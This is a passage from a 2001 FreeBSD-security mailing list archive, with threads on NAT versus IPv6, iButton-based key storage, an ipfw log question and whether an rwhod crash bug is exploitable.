any attempt to move from IPv4 to IPv6, > and most other ISP's that are out there are going to fight it as well. In > the meantime I'm pushing all my customers into using NAT. NAT is here to > stay and people that run around calling it an aberration are just proving to > the rest of us that they have absolutely no business sense. > > NAT has proven itself reliable and vital and idiot engineers that design TCP > protocols that assume everyone has a public IP number are just architecting > their own failures, and their protocol's subsequent minimizing by the > market. I have some sympathy for protocols like IPSec that came to be > during the same time - but organizational-to-organizational IPSec tunnels > don't have to pass through the NAT - they can terminate on it. But, anyone > doing a new protocol today is a fool if it can't work though a NAT. > > > > Ted Mittelstaedt tedm@toybox.placo.com > Author of: The FreeBSD Corporate Networker's Guide > Book website: http://www.freebsd-corp-net-guide.com > > > --------------080107090808010207030409 Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: 7bit Ted, Loved the book--can't wait for the movie!

This is a religious war that's been fought many times before. Since my last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are all just tools that I have to apply with "business sense." NAT's not inherently evil, nor is IPv6. Their sensibility will change over time and depend upon the application.

If I were shopping for DSL for "my mom," I wouldn't care if she got a public address or not. Reliability and good support (as a "little guy" can more often provide) would be more important.

But when I'm shopping for DSL for a work-from-home, multicast protocol stack developer, a public address is a requirement. In fact, it's something I'll pay extra to get. For my business, IPSec is important and hence having at least one public address is important.

My protocol developers have a few LANs at home and we happily use NAT there. I wouldn't pay extra to get enough address space to put public addresses on all their home lab machines.

An ISP who won't give me at least one public address is just limiting where I can apply their service. An ISP who gives me one or more public addresses let's me pick the point at which I want to apply NAT.

So in spite of my flip remarks, I hope you can see that I do use NAT--I just put it off to the last minute where it doesn't make business sense to avoid it.

   Bob

Ted Mittelstaedt wrote:
-----Original Message-----
From: owner-freebsd-questions@FreeBSD.ORG
[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
Sent: Monday, March 12, 2001 8:07 AM
To: pW
Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel


Yes. The five DSL setups with which I'm familiar all grant at least one
public address per house. I believe all are static, but one might be
dynamic. Interference with protocols like IPSec is one of the reasons
why I'd make a public address a requirement when choising a DSL!

provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
possible. Let's hasten the deployment of IPv6.


I'd agree with you if everyone that would have to do a renumber of a
large network from IPv4 to IPv6 had Vint Cerf's money.  When your retired
like him with money coming out your arse-hole you can afford to make
irresponsible statements like that.

Unfortunately, what people like him don't understand is that the burden of
renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely
on people like me - who have thousands of customers and tens of thousands of
public IP numbers spread out among all of them - and who don't have the
money to support something this audacious.  I can almost guarentee that
whatever ISP that I am working for when this finally happens is going to go
out of business, all it's going to do is put thousands of smaller to
medium-sized ISP's into bankruptcy and let people like AOL who have money
coming out their arse-holes virtually monopolize Internet access in the
world.
!

Until I see the large organizations with Class A's tied up, give up those
numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
and most other ISP's that are out there are going to fight it as well.  In
the meantime I'm pushing all my customers into using NAT.  NAT is here to
stay and people that run around calling it an aberration are just proving to
the rest of us that they have absolutely no business sense.

NAT has proven itself reliable and vital and idiot engineers that design TCP
protocols that assume everyone has a public IP number are just architecting
their own failures, and their protocol's subsequent minimizing by the
market.  I have some sympathy for protocols like IPSec that came to be
during the same time - but organizational-to-organizational IPSec tunnels
don't have to pass through the NAT - they can terminate on it.  But, anyone
doing a new protocol today is a fool if it can't work though a NAT.!




Ted Mittelstaedt                      tedm@toybox.placo.com
Author of:          The FreeBSD Corporate Networker's Guide
Book website:         http://www.freebsd-corp-net-guide.com




--------------080107090808010207030409-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 6:51: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18]) by hub.freebsd.org (Postfix) with ESMTP id 3D19237B72C for ; Tue, 13 Mar 2001 06:50:51 -0800 (PST) (envelope-from terje@thinksec.no) Received: by tiger.thinksec.com (Postfix, from userid 1001) id 970C5106042; Tue, 13 Mar 2001 15:50:47 +0100 (CET) Date: Tue, 13 Mar 2001 15:50:46 +0100 From: Terje Elde To: Daniel Hagan Cc: freebsd-security@freebsd.org Subject: Re: iButton Development Message-ID: <20010313155046.E9762@thinksec.com> References: <3AADB1D3.C70E00C@colltech.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="Oiv9uiLrevHtW1RS" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AADB1D3.C70E00C@colltech.com>; from dhagan@colltech.com on Tue, Mar 13, 2001 at 12:36:19AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --Oiv9uiLrevHtW1RS Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Mar 13, 2001 at 12:36:19AM -0500, Daniel Hagan wrote: > There was some discussion regarding iButtons in mid-Jan on this list.=20 > I'm interested in getting one or more of these things to play with, with > the goal of: For reasons I don't quite know I missed that thread... However I'm the coordinator of the iButton project, which aims to define a set of API's to communicate with iButtons, or the 1-wire bus in general, as well as making a daemon to handle the actual communication with the 1-wire bus, as well as multiplexing between users and applications where desired. I must admit the project has been idle for a little while now, though I'm s= ure a cooperation could be mutually beneficial. > o Authenticating myself to my home workstations (pam module?). Our plans include making pam module which uses the API's(/sdk) for either simple authentication using the serial number on the iButtons (yuck) or my favorite, full public key authentication using the java iButtons. > o Storing PGP & ssh keys. Also a obvious extension. One idea we've been playing with is to not only keep the keys on the button, but never to let them be anywhere else. The j= ava iButton for example, could handle the cryptographic functions for you. It features cool things like rapid destroying of the content should you try to tamper with it. > Since I assume these are tasks of interest to more people than just > myself, I was wondering: >=20 > o Does anyone have existing code bases to support these tasks? We've done very basic coding and design of the API's, though we don't have = any of the code working with the actual buttons up and running yet. > o Is there any support (in the political sense) for getting the pam > module and/or other code incorporated into the base system or as a port? Strong cryptographic authentication system and secure storage with possible extension of cheap industrial chips with everything from temp sensors to AD= /DA converters and whatnot. Who wouldn't want it? > o Does anyone have any recommendations on what hardware to procure for > these tasks? I was looking at getting a serial port BlueDot (possibly > two or three, I have some laptops I may want to use this with too) and a > DS1996L-F5 64-kbit Memory iButton. I would also think about getting a > Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood > exactly what I'd be getting for the money. Does anyone have any > information/examples on how these Java iButtons are used? You probably want the following (in the order they're listed in the dalsemi shop online): * DS1921L-F52 - Thermochron (-20=B0C to +85=B0C) It'll allow you to play more with the bus, making sure the knowledge sticks. Not really required for these tasks, but it's so cute. * DS19550-401 - Java-powered iButton, Model 96, Release 1.1 * DS1957B-406 - Java-powered iButton, Model 96, Release 1.1 =20 You want both, because if you're going to do development on these, you'll probably want to make sure your software will work properly on both. As for what you'll get... =20 * JVM These babies actually run Java code, as long as they're docked and have power. As soon as you rip out the power, the applications are still i= n a running state, but they're execution speed is frozen so to speak. =20 * PRNG Perfect to both feed your Java code, and perhaps also relay to a FreeB= SD box to help feed it's PRNG. * Crypto * SHA-1 * RSA * DES * 3DES The math accelerator for RSA operations handles them with a less than 1 sec worst-case. At least the 2.2 release has 134kbytes of RAM, which makes it the iBut= ton with the biggest storage. * DS1963S-F5 - SHA-1 iButton You'll want this so you can do keyed hashes for authentication. It's mu= ch better than the java iButtons for this task, due to it's lower price. In addition to those you'll want some of the other memory iButtons, a nice selection to fit your taste. I recommend you get at least two or so of the bigger ones, and as many as you feel like of the cheaper. For connectivity I would like to suggest that you get one or several serial adaptors, with matching bluedots. Let me remind you that there are differences between them, but which you'd want is perhaps a matter of taste. Getting some of each might not be a bad idea. I would recommend you stick with serial, as they're supposedly easier to use, and has some software already available (hint: ports/comms/mlan, though it's not up to date (hint= )). You might also want to look at the TINI, as it's got a 1-wire device, and would be pretty nice to integrate with everything. Terje "delta" Elde ThinkSec AS --Oiv9uiLrevHtW1RS Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rjPGtO3jfBe8qO0RAjK3AJ9t+VS+teR9jzyqkq5Vn0V9B1x2RQCfXbG4 rdCFa/r/9xjfdth83VbHeKo= =mDuZ -----END PGP SIGNATURE----- --Oiv9uiLrevHtW1RS-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 6:59:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136]) by hub.freebsd.org (Postfix) with ESMTP id 9E15D37B71F for ; Tue, 13 Mar 2001 06:59:12 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id PAA43884; Tue, 13 Mar 2001 15:59:11 +0100 (CET) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DExTp07859; Tue, 13 Mar 2001 15:59:29 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: Terje Elde Cc: Daniel Hagan , freebsd-security@FreeBSD.ORG Subject: Re: iButton Development In-Reply-To: Your message of "Tue, 13 Mar 2001 15:50:46 +0100." <20010313155046.E9762@thinksec.com> Date: Tue, 13 Mar 2001 15:59:29 +0100 Message-ID: <7857.984495569@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org My share in this is mostly the monitoring gadgets with the 1wire products, but given working software I would probably put my pgp key somewhere more safe as well. -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 7: 5:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18]) by hub.freebsd.org (Postfix) with ESMTP id 0732B37B724 for ; Tue, 13 Mar 2001 07:05:42 -0800 (PST) (envelope-from terje@thinksec.no) Received: by tiger.thinksec.com (Postfix, from userid 1001) id 22EC4106042; Tue, 13 Mar 2001 16:05:40 +0100 (CET) Date: Tue, 13 Mar 2001 16:05:40 +0100 From: Terje Elde To: Poul-Henning Kamp Cc: Daniel Hagan , freebsd-security@FreeBSD.ORG Subject: Re: iButton Development Message-ID: <20010313160540.F9762@thinksec.com> References: <20010313155046.E9762@thinksec.com> <7857.984495569@critter> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="R6sEYoIZpp9JErk7" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <7857.984495569@critter>; from phk@critter.freebsd.dk on Tue, Mar 13, 2001 at 03:59:29PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --R6sEYoIZpp9JErk7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Tue, Mar 13, 2001 at 03:59:29PM +0100, Poul-Henning Kamp wrote: > My share in this is mostly the monitoring gadgets with the 1wire > products, but given working software I would probably put my pgp > key somewhere more safe as well. I do see your concern, and I would not automatically trust the iButtons 100%, but it's a good hardware building block to base things on. If you store a encrypted version of your pgp/ssh keys on it, then you would really need to break the algorithm to gain access to the keys, in which case you can attack pgp in itself anyways. (simplified; if you break the symmetric cipher which has encrypted the keys stored on the iButton then you've got the keys, while if you had broken the same symmetric cipher in pgp itself, the keys would be safe as soon as you switch to another algorithm, and you would have to perform one such crack for each message). Or rather, in the end how things are set up and used is really up to the end user. My goal is to try to help provide the tools to make the technology available, and also the guidance to balance the risks. What makes a good choice is highly dependent on a lot of factors, and what's right for you isn't always right for everyone else. If my access was limited to a single shared win95 box, then I'd feel much more comfortable with a iButton performing the crypto for me, and keeping the keys, than storing them on the windows box. Terje "delta" Elde ThinkSec AS --R6sEYoIZpp9JErk7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rjdEtO3jfBe8qO0RAj1YAJ4p73caXUlQoCxQi9SkogN6tocCgQCfUWfW FfwG5z59uawYKJYAICvebyw= =QnMf -----END PGP SIGNATURE----- --R6sEYoIZpp9JErk7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 7:18:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18]) by hub.freebsd.org (Postfix) with ESMTP id 822DF37B72B for ; Tue, 13 Mar 2001 07:18:54 -0800 (PST) (envelope-from terje@thinksec.no) Received: by tiger.thinksec.com (Postfix, from userid 1001) id AEE51106042; Tue, 13 Mar 2001 16:18:52 +0100 (CET) Date: Tue, 13 Mar 2001 16:18:52 +0100 From: Terje Elde To: Borja Marcos Cc: Poul-Henning Kamp , freebsd-security@FreeBSD.ORG Subject: Re: iButton Development Message-ID: <20010313161852.G9762@thinksec.com> References: <3AADB1D3.C70E00C@colltech.com> <20010313155046.E9762@thinksec.com> <3AAE3809.F795A6A5@sarenet.es> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="RDS4xtyBfx+7DiaI" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3AAE3809.F795A6A5@sarenet.es>; from borjamar@sarenet.es on Tue, Mar 13, 2001 at 04:08:57PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --RDS4xtyBfx+7DiaI Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Mar 13, 2001 at 04:08:57PM +0100, Borja Marcos wrote: > > Also a obvious extension. One idea we've been playing with is to not o= nly > > keep the keys on the button, but never to let them be anywhere else. T= he java > > iButton for example, could handle the cryptographic functions for you. = It > > features cool things like rapid destroying of the content should you tr= y to > > tamper with it. >=20 > This would be the ideal system; when used for ssh, for example, > the button stores the private part of the RSA key, and the challenge is= =20 > sent by the ssh-agent to the button. It encrypts the challenge and > returns the answer. >=20 > If the key is kept inside the button, it can be useful even > in hostile environments. I understand that now there are buttons > capable of running small prograams. As Poul-Henning points out, doing this isn't for everyone. It pretty much boils down to what you trust the most. The security of your hardware/softw= are and your ability to set it up, or the iButtons. In the case of my private workstation, I'd normally prefer running the cryp= to on the workstation itself, not allowing the iButtons to be as much of a weak link. Should I ever have the need for ssh'ing from public company terminals to note quite secure systems on the other hand, this would be a good idea. A toolkit to pick what one likes from, not enforcing the way I want it one everyone else. Terje --RDS4xtyBfx+7DiaI Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rjpctO3jfBe8qO0RAgihAJ9L0CUVce5vJBxeLqnEXE4P1zszpACff1kF x90lqiz16wedeCk/ZVdc0aM= =Hywq -----END PGP SIGNATURE----- --RDS4xtyBfx+7DiaI-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 7:40:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 84A3937B71B; Tue, 13 Mar 2001 07:40:49 -0800 (PST) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (4509 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Tue, 13 Mar 2001 09:37:26 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Tue, 13 Mar 2001 09:37:23 -0600 (CST) From: James Wyatt To: Ted Mittelstaedt Cc: Bob Van Valzah , pW , FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG Subject: RE: Racoon Problem & Cisco Tunnel In-Reply-To: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Mar 2001, Ted Mittelstaedt wrote: > >-----Original Message----- > >From: owner-freebsd-questions@FreeBSD.ORG > >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah > >Sent: Monday, March 12, 2001 8:07 AM > >Subject: Re: Racoon Problem & Cisco Tunnel > > > >Yes. The five DSL setups with which I'm familiar all grant at least one > >public address per house. I believe all are static, but one might be > >dynamic. Interference with protocols like IPSec is one of the reasons > >why I'd make a public address a requirement when choising a DSL > >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all > >possible. Let's hasten the deployment of IPv6. [ ... ] > Until I see the large organizations with Class A's tied up, give up those > numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6, > and most other ISP's that are out there are going to fight it as well. In > the meantime I'm pushing all my customers into using NAT. NAT is here to > stay and people that run around calling it an aberration are just proving to > the rest of us that they have absolutely no business sense. NAT is a tool and you can hurt yourself with it or do useful things with it, not an aberration or silver-bullet. Folks with fast hosts or small amounts of traffic and simple needs love it - especially home broadband users. There is a trade-off for many router users though: a) just change the header when NAT-ting, or b) correct the packet checksums and lose your ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer networking for groups of workstations across NAT barriers difficult if you have to chew-up static IPs from what I can tell. Many large corporations like GE Corp have huge RFC networks internally. If you ever have to make an internal Frame Relay link between them behind their public firewalls, you will learn new words for describing RFC networking limitations. "Oh &$*^^%! Our router thinks their Chicago server is on the same LAN segment as our Fort Worth server, but with a different netmask. Which of us should renumber our servers? Can IPSec help this?" > NAT has proven itself reliable and vital and idiot engineers that design TCP > protocols that assume everyone has a public IP number are just architecting > their own failures, and their protocol's subsequent minimizing by the > market. I have some sympathy for protocols like IPSec that came to be > during the same time - but organizational-to-organizational IPSec tunnels > don't have to pass through the NAT - they can terminate on it. But, anyone > doing a new protocol today is a fool if it can't work though a NAT. When IPv4 was designed, everyone could have had their own number. It was done a *long* time ago, and did not envision "The Internet Explosion". Everyone else has just followed the specs so things interoperated. If those "idiot engineers" hadn't done that, you wouldn't have equipment coming out your "*rse-h*le" today. (^_^) btw: If you stopped saying everyone else (including Vint Cerf, however misgiuded or misquoted) is an idiot fewer folks might miss your otherwise valid points. If I get it: "NAT works and IPv6 is still a *long* way off for many very strong commercial realities." I gotta mostly agree with that, but NAT has a price as well. I hate fudging checksums because, while they only cause a little more coding for script kiddies making fake- or poison-packet generators, they also help ENet reliability. There are more things hurting packets than just collisions. If the world ever decides to jump to IPv6, all the server folks have to renumber as well. How is this all supposed to happen without massive outages and downtime? - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 8:39:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from agora.rdrop.com (agora.rdrop.com [199.2.210.241]) by hub.freebsd.org (Postfix) with ESMTP id A7D9837B718 for ; Tue, 13 Mar 2001 08:39:35 -0800 (PST) (envelope-from alan@agora.rdrop.com) Received: (from alan@localhost) by agora.rdrop.com (8.11.1/8.11.1) id f2DGeKb08565 for security@freebsd.org; Tue, 13 Mar 2001 08:40:20 -0800 (PST) Date: Tue, 13 Mar 2001 08:40:20 -0800 From: Alan Batie To: security@freebsd.org Subject: ipfw rule -1? Message-ID: <20010313084020.A5859@agora.rdrop.com> Mail-Followup-To: security@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm seeing a few of these in my ipfw log and was wondering what rule -1 is? I couldn't find anything about it in the man page... > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 > ipfw: -1 Refuse TCP 62.29.124.91:97 199.2.210.241:29540 in via etha16 > ipfw: -1 Refuse TCP 62.29.124.91:20041 199.2.210.241:17227 in via etha16 -- Alan Batie ______ www.rdrop.com/users/alan Me alan@batie.org \ / www.qrd.org The Triangle PGPFP DE 3C 29 17 C0 49 7A \ / www.pgpi.com The Weird Numbers 27 40 A5 3C 37 4A DA 52 B9 \/ www.anti-spam.net NO SPAM! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 8:44:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 8A35C37B718 for ; Tue, 13 Mar 2001 08:44:27 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id LAA73764; Tue, 13 Mar 2001 11:44:24 -0500 (EST) (envelope-from wollman) Date: Tue, 13 Mar 2001 11:44:24 -0500 (EST) From: Garrett Wollman Message-Id: <200103131644.LAA73764@khavrinen.lcs.mit.edu> To: security@freebsd.org Subject: rwhod In-Reply-To: <200103122347.f2CNlxT28110@freefall.freebsd.org> References: <200103122347.f2CNlxT28110@freefall.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 < said: > Remote users can cause the rwhod daemon to crash, denying service to > clients. It's worth noting that most people who run `rwhod' use it only for ``tourist information'' anyway and do not actually depend on the information it provides. I run it on my servers so that the nightly reports will include the summary of uptimes and load averages, but if one daemon goes AWOL I'll not be particularly concerned. If, on the other hand, this bug is actually exploitable, that would be much more serious (and would warrant a reissue of the advisory). - -GAWollman -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6rk5lI+eG6b7tlG4RAm4xAJ9sm/QFEbRIjppfMI776herCdCN4ACfZ0NK 7ec//L3imXWdyEoI4dcCgJ4= =MStX -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 9: 1: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 8724137B719; Tue, 13 Mar 2001 09:00:56 -0800 (PST) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2DGwFN20651; Tue, 13 Mar 2001 08:58:16 -0800 (PST) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: "James Wyatt" Cc: "Bob Van Valzah" , "pW" , , Subject: RE: Racoon Problem & Cisco Tunnel Date: Tue, 13 Mar 2001 08:58:14 -0800 Message-ID: <000801c0abde$cb31c5a0$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >-----Original Message----- >From: owner-freebsd-questions@FreeBSD.ORG >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of James Wyatt > >NAT is a tool and you can hurt yourself with it or do useful things with >it, not an aberration or silver-bullet. Folks with fast hosts or small >amounts of traffic and simple needs love it - especially home broadband >users. There is a trade-off for many router users though: a) just change >the header when NAT-ting, or b) correct the packet checksums and lose your >ASIC efficiency and kill your shared-CPU. NAT can also make peer-to-peer >networking for groups of workstations across NAT barriers difficult if you >have to chew-up static IPs from what I can tell. > >Many large corporations like GE Corp have huge RFC networks internally. If >you ever have to make an internal Frame Relay link between them behind >their public firewalls, you will learn new words for describing RFC >networking limitations. "Oh &$*^^%! Our router thinks their Chicago server >is on the same LAN segment as our Fort Worth server, but with a different >netmask. So what? Different netmasks create different subnets. It's perfectly fine to have 2 different subnets on the same segment. Now, if your using the word "segment" to mean something other than a physical segment, but rather to mean "subnet" then your statement is impossible. If both systems have different netmasks (and not the same IP addresses, of course) then it's impossible for them to be on the same subnet. Same physical segment, yes, but not the same subnet. > Which of us should renumber our servers? Neither. Sites that are geographically distant should be on separate subnets. > >When IPv4 was designed, everyone could have had their own number. It was >done a *long* time ago, and did not envision "The Internet Explosion". >Everyone else has just followed the specs so things interoperated. If >those "idiot engineers" hadn't done that, you wouldn't have equipment >coming out your "*rse-h*le" today. (^_^) > The engineers that designed all that wern't idiots - as they emphasized interoperability. If someone had come along back then and said "Let's throw away the IPv4 scheme and replace it with IPv6 because we might run out of numbers in the future" those engineers would have squashed that on the interoperability altar. >btw: If you stopped saying everyone else (including Vint Cerf, however >misgiuded or misquoted) is an idiot fewer folks might miss your otherwise >valid points. I'm not. I'm saying that people that insist the problem is we haven't all switched over to IPv6 are idiots. I'm also saying that engineers that sit down TODAY at a blank drawing board, AFTER NAT IS A REALITY, and design TCP/IP protocols that are incompatible with it are idiots. The majority of Internet engineers are NOT in this group. There's a vocal minority that is and are currently engaged in running around and telling the majority that we are doing it wrong by using NAT. If I get it: "NAT works and IPv6 is still a *long* way off >for many very strong commercial realities." I gotta mostly agree with >that, but NAT has a price as well. > Any connectivity solution has a price. NAT's price is cheaper than the price of renumbering the entire Internet to IPv6 and it will remain so until we truly are out of numbers, not just dealing with an artifical shortage. Sorry, but engineers that ignore this fiscal reality are idiot dreamers in my opinion. >I hate fudging checksums because, while they only cause a little more >coding for script kiddies making fake- or poison-packet generators, they >also help ENet reliability. There are more things hurting packets than >just collisions. > >If the world ever decides to jump to IPv6, all the server folks have to >renumber as well. How is this all supposed to happen without massive >outages and downtime? - Jy@ > The IPv6 crowd is trying to frame the question as "It's not whether or not we are going to switch, it's when" I'm interested to see your framing the question as "It's not when we are going to switch to IPv6, it's IF" I'm not even saying that. All I'm saying is that there is a tremendous amount that can be done to extend the lifetime of the current infrastructure, that includes NAT, extracting large public blocks from corporations that don't use them publically, and many other things. I'm saying that it's likely that in our lifetimes that the Internet will NOT be switched over to IPv6. But, I'm not saying that it will NEVER be. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 9:15:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from salmon.maths.tcd.ie (salmon.maths.tcd.ie [134.226.81.11]) by hub.freebsd.org (Postfix) with SMTP id 815D837B719 for ; Tue, 13 Mar 2001 09:15:17 -0800 (PST) (envelope-from iedowse@maths.tcd.ie) Received: from walton.maths.tcd.ie by salmon.maths.tcd.ie with SMTP id ; 13 Mar 2001 17:15:16 +0000 (GMT) To: Garrett Wollman Cc: security@freebsd.org, iedowse@maths.tcd.ie Subject: Re: rwhod In-Reply-To: Your message of "Tue, 13 Mar 2001 11:44:24 EST." <200103131644.LAA73764@khavrinen.lcs.mit.edu> Date: Tue, 13 Mar 2001 17:15:16 +0000 From: Ian Dowse Message-ID: <200103131715.aa18169@salmon.maths.tcd.ie> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <200103131644.LAA73764@khavrinen.lcs.mit.edu>, Garrett Wollman write > >If, on the other hand, this bug is actually exploitable, that would be >much more serious (and would warrant a reissue of the advisory). I am pretty certain that there is nothing exploitable about this bug. The code ends up doing something like: int *p = &local_variable; for (;;) { p[4] = ntohl(p[4]); p[5] = ntohl(p[5]); p += 6; } The variable `p' is a register variable in the dissassembly I looked at. So this simply scans forward through the stack byte-swapping ints, until it reaches inaccessible memory and dies. Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 9:31:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailgate.kechara.net (mailgate.kechara.net [62.49.139.2]) by hub.freebsd.org (Postfix) with ESMTP id ECC9B37B718 for ; Tue, 13 Mar 2001 09:31:11 -0800 (PST) (envelope-from lee@kechara.net) Received: from area57 (lan-fw.kechara.net [62.49.139.3]) by mailgate.kechara.net (8.9.3/8.9.3) with SMTP id SAA10089 for ; Tue, 13 Mar 2001 18:41:11 GMT Message-Id: <200103131841.SAA10089@mailgate.kechara.net> Date: Tue, 13 Mar 2001 17:35:00 -0000 To: 